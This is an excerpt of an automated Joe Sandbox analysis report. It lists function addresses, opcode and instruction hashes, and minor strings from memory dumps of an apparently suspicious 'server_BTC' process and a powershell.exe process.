Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID: Jdq
API String ID: 0-1891755625
Opcode ID: 281a9acdd855f429c0937464d048d8bd28ef06912674ce2ec53e74827a39f5ed
Instruction ID: 1c998281a4119289e14d2058d81bf856e364f3e5f3bf0535e41aa47de37a1527
Opcode Fuzzy Hash: 281a9acdd855f429c0937464d048d8bd28ef06912674ce2ec53e74827a39f5ed
Instruction Fuzzy Hash: F141E175E002089FDB08DFA9D594AEEBBF2FF88301F108069E525A73A4DB349945CF94

Function 01217500 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

Jdq, xrefs: 01217611

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID: Jdq
API String ID: 0-1891755625
Opcode ID: 30344349eb6a00527c8ded6c54eaa9659f3df02b1c63d0353347cb8ee54bd31a
Instruction ID: d0ba8257524628a22e651936861963c62feb4454267bc3a5574523b6c3ea75a0
Opcode Fuzzy Hash: 30344349eb6a00527c8ded6c54eaa9659f3df02b1c63d0353347cb8ee54bd31a
Instruction Fuzzy Hash: 4541C175E002089FCB08DFA9D594AEEBBF2AF89301F108069E515A73A4DB359945CF94

Function 01215348 Relevance: .9, Instructions: 941COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa9a67f054b616b4783d38d4f89f3003ea8ba0ac1bad9f6b2118ba24f0d2ef2
Instruction ID: 2ac40509061c04bbc427a26440ec6808b627b99f830a80feacb660397b7807b3
Opcode Fuzzy Hash: bfa9a67f054b616b4783d38d4f89f3003ea8ba0ac1bad9f6b2118ba24f0d2ef2
Instruction Fuzzy Hash: 9FB29E70D11269CFCB69EF64C894AADB7B2BB59304F6085E9D40DAB368DB315E81CF40

Function 01215358 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdce409377be12cf66d587937e0baf6593309f3070757413dad9404ce18133a4
Instruction ID: 7d3d025007dc85c893df4ee39792583b512118ee6b61b27d02ee269cebad7308
Opcode Fuzzy Hash: bdce409377be12cf66d587937e0baf6593309f3070757413dad9404ce18133a4
Instruction Fuzzy Hash: B6B29F70D11269CFCB69EF64C894AADB7B2BB59304F6085E9D40DAB368DB315E81CF40

Function 01210839 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788f3eeadff723da24586e2eeb85e2968053e5e2d31771e22d5883eda2601012
Instruction ID: 68f05504c3b2ec9c3485209877d974b2d28c21ae5df92775c73f1a83349ed837
Opcode Fuzzy Hash: 788f3eeadff723da24586e2eeb85e2968053e5e2d31771e22d5883eda2601012
Instruction Fuzzy Hash: 6062BC70A01269CFDB69DF64D894B9DBBB2FB48304F1080A9D41EA7764EB319E85CF41

Function 01210848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87be73af6604297e743c557b6f40c9dfd8e999b207d63e289ef220abccc4bcef
Instruction ID: 14841ee1917778c813df6b55eb79161bf9ea77d8daac78b864206d568b98307b
Opcode Fuzzy Hash: 87be73af6604297e743c557b6f40c9dfd8e999b207d63e289ef220abccc4bcef
Instruction Fuzzy Hash: C362BC70A01269CFDB69DF64D894B9DBBB2FB48304F1080A9D41EA7764EB319E85CF41

Function 01217AE1 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763f7bda4491ddf4d0e47a0c3b557ef390a3cde2473727a8704a5ec53456234a
Instruction ID: 2e66cb985b41976df3f2e266b4b6ad5944970821ccd3b9ef20522160e2ac1574
Opcode Fuzzy Hash: 763f7bda4491ddf4d0e47a0c3b557ef390a3cde2473727a8704a5ec53456234a
Instruction Fuzzy Hash: F441F1B0D10248DFDB14DFEAD484AAEFFF5AF99300F24842AE448AB254C7345885CF50

Function 012167F0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2681621e579d0ed8632fb52c0789727d3e8a1bbcfb81b50b8dd7e32b56eaa88b
Instruction ID: df1181c23c510cf50e9465cc1256bc6d1627c26b9f7035c4c16862d17e9f1762
Opcode Fuzzy Hash: 2681621e579d0ed8632fb52c0789727d3e8a1bbcfb81b50b8dd7e32b56eaa88b
Instruction Fuzzy Hash: BAB1EC74E01229CFDB64DF68C984B9DBBB2BB49204F1085E9D40DA7354DB70AE89CF52

Function 01217108 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1991f7fbf442d64748431ed7f131f917c00e93c0bff9eedc636657bc4d2da9e8
Instruction ID: 4c0198b8d394322443d63d1077baabec0ebc5f0d136a450266a0b49cf992f0c7
Opcode Fuzzy Hash: 1991f7fbf442d64748431ed7f131f917c00e93c0bff9eedc636657bc4d2da9e8
Instruction Fuzzy Hash: 4C61E374A502488FCB48DFA8D994A9DBBF2FF4A310F108069E915AB369DB31AC45CF54

Function 01218100 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52cc17b9ff40d381f29c630058763e6637bb299d4e1adf6679d6f507cb477948
Instruction ID: 3a72fa70dc300d76beff22fbc899d2475a1d8e8fadcb40327e99cb5a8a199fcb
Opcode Fuzzy Hash: 52cc17b9ff40d381f29c630058763e6637bb299d4e1adf6679d6f507cb477948
Instruction Fuzzy Hash: EE81B074E10219CFCB54EFA4D894AADBBF2BF59304F2084A9D509AB369DB306D41CF50

Function 012180F7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227945420f7e1cc26e2f04e385b5b48c94900d988aba0b130179bfd894d77df9
Instruction ID: 99018cc4fa27f73fc73925ba51b8622ede63773f6cd84ee7ab8f170e99d1a1f4
Opcode Fuzzy Hash: 227945420f7e1cc26e2f04e385b5b48c94900d988aba0b130179bfd894d77df9
Instruction Fuzzy Hash: 9981BF74E102198FCB54EFB8D894AADBBB2BF59304F6084A9D409AB369DB306D41CF10

Function 012165C0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c0dba4ed69333ec99208cabf4bdbc36f0a9f10e637dbbd8568f8ea5ad64a9c0
Instruction ID: e3f34be5cb084c404aa72aade095481e9522a7bccc0992634fc5553c7edee6c5
Opcode Fuzzy Hash: 1c0dba4ed69333ec99208cabf4bdbc36f0a9f10e637dbbd8568f8ea5ad64a9c0
Instruction Fuzzy Hash: 3A41FE78D14209CFDB04DFE9E4846EDBBF1BB59300F20402AE429AB398EB745946CF40

Function 01217D10 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 870a3a5bc0176686452521200043cd4fe92604a31cf792d569d10dfc66c5b69c
Instruction ID: c163d1143dee4e5ffe633502cf40385d44d31cb621a9cc71679bfc9f526e4a54
Opcode Fuzzy Hash: 870a3a5bc0176686452521200043cd4fe92604a31cf792d569d10dfc66c5b69c
Instruction Fuzzy Hash: 3741BFB0D1024C9FDB14DFEAD584A9EFFF5AF99300F24802AE419AB254DB745985CF50

Function 012173A0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57936901bd1b188be4986ff3990a207f5e06533554bd887c2009c16712b1923
Instruction ID: 9986f25032949f4fa72e44a7f1eac6bff7e1d9968397eee51745abce2062ec3e
Opcode Fuzzy Hash: a57936901bd1b188be4986ff3990a207f5e06533554bd887c2009c16712b1923
Instruction Fuzzy Hash: F631EE70E012098FCB08DFB4D440AEEB7B2EF89304F60946AD415B7394DB36AD41CB65

Function 012173B0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a698aa644011852d3038fd62e75ffd4ea64f799ee21d83374c6289ccf863cfa5
Instruction ID: f33279f039bf332530d1aa0204e58a06a7b9b6b42caea8f29cfb82320656b3d1
Opcode Fuzzy Hash: a698aa644011852d3038fd62e75ffd4ea64f799ee21d83374c6289ccf863cfa5
Instruction Fuzzy Hash: EA21EE70E012098FCB18EBB4D440AEEB7B2EF89304F6094A9D415B7394DB36AD41CB64

Function 012151F7 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05da6f2f2c18b8fcfcf5956761a7ffaf2f478ad4e0d1fada7976b51fabb95716
Instruction ID: be62a1c0eeeecbdf7414c5969ffaddbb6b884a88fc28468cff18900996a1fc90
Opcode Fuzzy Hash: 05da6f2f2c18b8fcfcf5956761a7ffaf2f478ad4e0d1fada7976b51fabb95716
Instruction Fuzzy Hash: 45218C72C242568FD704EFB8D8593ED7BB0EB06305F0448AAD41163295DB785685CB85

Function 0121842F Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5c6043a45ddf5f502f28476480a8d05198c2f7124227839c1bb0104120c1e7
Instruction ID: c3e0e05c810e9b76a6e1cdc4f35d717427847d45d15e16d2d849b4bb6923d9dd
Opcode Fuzzy Hash: 1e5c6043a45ddf5f502f28476480a8d05198c2f7124227839c1bb0104120c1e7
Instruction Fuzzy Hash: D811263A314241DFD706AF7CD56559A7FB6EF46304B0104A9D145CB3A6DE34CC19C782

Function 01218450 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3be586ac72cba5f3bf43654013d8a0f49890ae0cac3f430bd1d9c8a4fdea4b
Instruction ID: 724b064977f13a1c1326db11ca2184d0885b598134358af5130c32566fd840e1
Opcode Fuzzy Hash: 0f3be586ac72cba5f3bf43654013d8a0f49890ae0cac3f430bd1d9c8a4fdea4b
Instruction Fuzzy Hash: 7C018F7A710211DFD709AF6CE555A9E7BAAFF85258B004028D50ACB368EF31DC149BD2

Function 01215238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bcfed31984f91e37bd365c22f9b92d74061d0d4903bdbc2985d37426f0f4f4c
Instruction ID: 05a3569df068beef384fb14b2ebb1ff5d34eec9a14c4758b7519b84c165d6817
Opcode Fuzzy Hash: 8bcfed31984f91e37bd365c22f9b92d74061d0d4903bdbc2985d37426f0f4f4c
Instruction Fuzzy Hash: 87015A71C2021ADFDB04EFB8D41D7AEBFF0EB46301F0498A99526A3294DB780684CF91

Function 01218391 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88e5563f4eba36f2dd3f4ff838374cfb5da9daaae3aa40c619f87721bce041e
Instruction ID: 90081ca9907e0ef7111cee8b7e61a664c9ba98092152ec30d607269939d2f28f
Opcode Fuzzy Hash: b88e5563f4eba36f2dd3f4ff838374cfb5da9daaae3aa40c619f87721bce041e
Instruction Fuzzy Hash: 05017274B41319AFCB68DB34D850BAE7332AF86215F5094A9804D67290CE369E86CF1A

Function 01216C3E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c143f8da0e1238ef8e83bb25aeca7044b7d46fa44394602690e62943fb2f2f30
Instruction ID: d2dfed0af54f9c2dfd51f7563b8052c8bb279166e31c51329dcc4a39b1a26768
Opcode Fuzzy Hash: c143f8da0e1238ef8e83bb25aeca7044b7d46fa44394602690e62943fb2f2f30
Instruction Fuzzy Hash: DCF01C75D10156CFCB64DFA8E4487BCBFB0EF5A312F0464A6E50AA3250CB309985CF14

Function 01217499 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82abe7c801fd5a107a2d5a86cae7f04ed49749504069ac6a5711e341c7132099
Instruction ID: 755b1f5dcb37098254c8c6c8d3299624c9a279cc74a93d19dab7aadc53bcc825
Opcode Fuzzy Hash: 82abe7c801fd5a107a2d5a86cae7f04ed49749504069ac6a5711e341c7132099
Instruction Fuzzy Hash: 7BF03074D20204DFC714EF78E648A687FB0FB08311F1441A9E90493365EB309D81CB81

Function 01216757 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c72b7a95777cb201eed375ee4a85fdf430efd0e96cb9c6a18a1f8b830ea534c
Instruction ID: 1b1d83880cf2430aef2400843343c6234093552f3daec0047b1076140d66e4b4
Opcode Fuzzy Hash: 3c72b7a95777cb201eed375ee4a85fdf430efd0e96cb9c6a18a1f8b830ea534c
Instruction Fuzzy Hash: C2E02230921248DFCB05EFB8EA0969D7FB9EF15300F1440A9E8099324AEB312E44DB82

Function 012174A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f84c5fd558f4fa10f5f9453832df3e5cc08eb6d3e29b390d2411c5c6f4611d9
Instruction ID: 4bda26428faf49d9ded599fa1cb86149f7bd88feade0fd9f818b21ed8b2d8763
Opcode Fuzzy Hash: 2f84c5fd558f4fa10f5f9453832df3e5cc08eb6d3e29b390d2411c5c6f4611d9
Instruction Fuzzy Hash: DAE01AB8910218DFC744EF68E548A59BFB0FB49311F5041A9D90993365EB309D95CB90

Function 01216768 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cdebfaac2c2cdcef7f85adc7a664c78b6130491803ef0fc807947d55a1dc7a
Instruction ID: 0bb043fe19a01b9f948c51d3b396b4678506c097e57902a128b9bda109db2260
Opcode Fuzzy Hash: 62cdebfaac2c2cdcef7f85adc7a664c78b6130491803ef0fc807947d55a1dc7a
Instruction Fuzzy Hash: 28E08671911109DFC704EFB8E609A5DBBB9EF04304F508568D40993259EB726E14D780

Function 01216D40 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd8b6239315cdf2f504340c33181f8c00ca86051192057c839a6e0d0f3d5148
Instruction ID: a69a808c916b763fdaf4e76f367a6c46aaf46b81a4eb47c6340f7882ba67c07d
Opcode Fuzzy Hash: abd8b6239315cdf2f504340c33181f8c00ca86051192057c839a6e0d0f3d5148
Instruction Fuzzy Hash: 81D0A772C203469FC315DBB4F909754BF79EB02316F8842ADE51893246EBB590D0C7D6

Function 01217650 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4895f682cd68440c4fe197139ea215600956f5f4aba602955cb64dd6618b9a
Instruction ID: 7dff2d7112d22968472238babf85b9413e7c65324a7f5961424d735f0e402282
Opcode Fuzzy Hash: ba4895f682cd68440c4fe197139ea215600956f5f4aba602955cb64dd6618b9a
Instruction Fuzzy Hash: 4AC01270811248DFD314DAB8B409A557E7CDB42216F400158A51852241DB714460C695

Function 01216D50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72920dd37554292450f28a2b16c09a9841ec25cab7bb9484f0b26e6e4c70c047
Instruction ID: 206ab37d7259291d92ea9b3c6929a697153c7759dea38e89b7af573c3c54c198
Opcode Fuzzy Hash: 72920dd37554292450f28a2b16c09a9841ec25cab7bb9484f0b26e6e4c70c047
Instruction Fuzzy Hash: 1EC08070C21209DFC315DF98B409B59BF7CD702312F804169E61853245DB715490C7E5

Analysis Process: powershell.exePID: 5792, Parent PID: 2820COMMON

Executed Functions

Function 0478B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

Y2n^, xrefs: 0478B557
{Y2n^, xrefs: 0478B6F0, 0478B6F5

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID: {Y2n^$Y2n^
API String ID: 0-4268513801
Opcode ID: d4cf972e886e499f202562bb3a473071e6913b845e9b4793642c94302dc7be86
Instruction ID: f137bac124efaae2f2d4a640d7e2ebb63a301ed9d54cc9c85d7223d27a1dde42
Opcode Fuzzy Hash: d4cf972e886e499f202562bb3a473071e6913b845e9b4793642c94302dc7be86
Instruction Fuzzy Hash: C6917470F506145BDB59EFB489509AE77A3EFC4708B40C92DD24AAB340DF34AD068BD6

Function 076D2308 Relevance: 32.9, Strings: 25, Instructions: 1613COMMON

Download Yara Rule

Strings

pioj, xrefs: 076D2363
4']q, xrefs: 076D31B6
$]q, xrefs: 076D2CBA
tP]q, xrefs: 076D3324
$]q, xrefs: 076D2CE0
pioj, xrefs: 076D23A0
$]q, xrefs: 076D2CEC
pioj, xrefs: 076D2416
4']q, xrefs: 076D2BE7
pioj, xrefs: 076D23B0
$a$k, xrefs: 076D357C
|,qj, xrefs: 076D25DB
tP]q, xrefs: 076D2D31
4']q, xrefs: 076D260D
4']q, xrefs: 076D2EEE
tP]q, xrefs: 076D3068
pioj, xrefs: 076D2582
tP]q, xrefs: 076D305C
4']q, xrefs: 076D31C0
tP]q, xrefs: 076D3330
tP]q, xrefs: 076D2D25
4']q, xrefs: 076D2619
4']q, xrefs: 076D2BDB
4']q, xrefs: 076D2EF8
$a$k, xrefs: 076D35F7

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: $a$k$$a$k$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$pioj$pioj$pioj$pioj$pioj$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$|,qj$$]q$$]q$$]q
API String ID: 0-618838785
Opcode ID: 4d03224de16d1af8ec883e9816d67bb12225f86256af52069239c644d8ade6ff
Instruction ID: 44113bd6817d5afde8fd28fec96035a4f67374ab4be2bf336930a5b798e21578
Opcode Fuzzy Hash: 4d03224de16d1af8ec883e9816d67bb12225f86256af52069239c644d8ade6ff
Instruction Fuzzy Hash: BBB259B1F24306CFCB259B7988207AABBE6BF85310F1484BAD546CB351DA35CC45C7A2

Function 076D3CE8 Relevance: 5.6, Strings: 4, Instructions: 580COMMON

Download Yara Rule

Strings

4']q, xrefs: 076D4030
4']q, xrefs: 076D4180
4']q, xrefs: 076D4026
4']q, xrefs: 076D418A

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: e1b3517106f7213043095bd3aff768025739080c23ed950b66c6e4793fa83172
Instruction ID: 46c1d0b487c96a17f2e65e4c8b1ccc7539009d21eae4494fd39321761646eb87
Opcode Fuzzy Hash: e1b3517106f7213043095bd3aff768025739080c23ed950b66c6e4793fa83172
Instruction Fuzzy Hash: 321247B1B143558FCB259B7998106BABFA2AFC5310F1484BAD946CF342DE35CC45CBA2

Function 04786FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(aq, xrefs: 04787105

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 8c517fc4ac92c960e61f41b6f2882958c5e763666a85e5ad3a1f5ac1d18f0a53
Instruction ID: df341206d7830457a5ccbba7ecc2376a24504eb9e35331865861b887035000a8
Opcode Fuzzy Hash: 8c517fc4ac92c960e61f41b6f2882958c5e763666a85e5ad3a1f5ac1d18f0a53
Instruction Fuzzy Hash: 50412E34B442048FDB19DF68C894AAEBBF2EF8D311F244499E406EB391DB35AC01CB61

Function 0478AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

(&]q, xrefs: 0478AFBA

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID: (&]q
API String ID: 0-1343553580
Opcode ID: eb636103ce2206c574bccff54d0d3142f1db7634d64a6418b2c260103a709ace
Instruction ID: fa1f09edc8e4cb4c794f90deb35fbc760a5e4711f71e4f5becb73cbc127a3465
Opcode Fuzzy Hash: eb636103ce2206c574bccff54d0d3142f1db7634d64a6418b2c260103a709ace
Instruction Fuzzy Hash: 3A21DE71A042588FCB14EFAED444AAEBFF5EF89320F14846ED408A7340CA74A805CBE5

Function 076D17B8 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed8317771b03419fe21c032fbe5216c10d430230433e492355ef6e0064da38f
Instruction ID: b44caf24d398c18737d6ddae892146c8b15b03ca53febe0149c5857ab1edb686
Opcode Fuzzy Hash: aed8317771b03419fe21c032fbe5216c10d430230433e492355ef6e0064da38f
Instruction Fuzzy Hash: 48B157B1F142099FCB189B79D4006AABBE6AFC7311F19C07AD446CB352DA71DD41C7A2

Function 047829F0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae18a2b49253245dbfff6903be2ded982162c2536a43228ad2c4d51f9c50ddc8
Instruction ID: 1bda7c398ea40afd7cc1d40c5e27b117f6d1b277033ad16c5f9ae449bc450644
Opcode Fuzzy Hash: ae18a2b49253245dbfff6903be2ded982162c2536a43228ad2c4d51f9c50ddc8
Instruction Fuzzy Hash: 1B919B74A002099FCB15DF58C5D49BEBBB1FF88311B248699D855AB3A6C736FC81CB90

Function 04787740 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a695260531b47584e123543919a5d78ed023c8b6d499fc23e1b8048cd876ff
Instruction ID: 2d52dd1a41c56977c7f4422ad77658c9f250a459f27e3ac613e9d60eb3b0b768
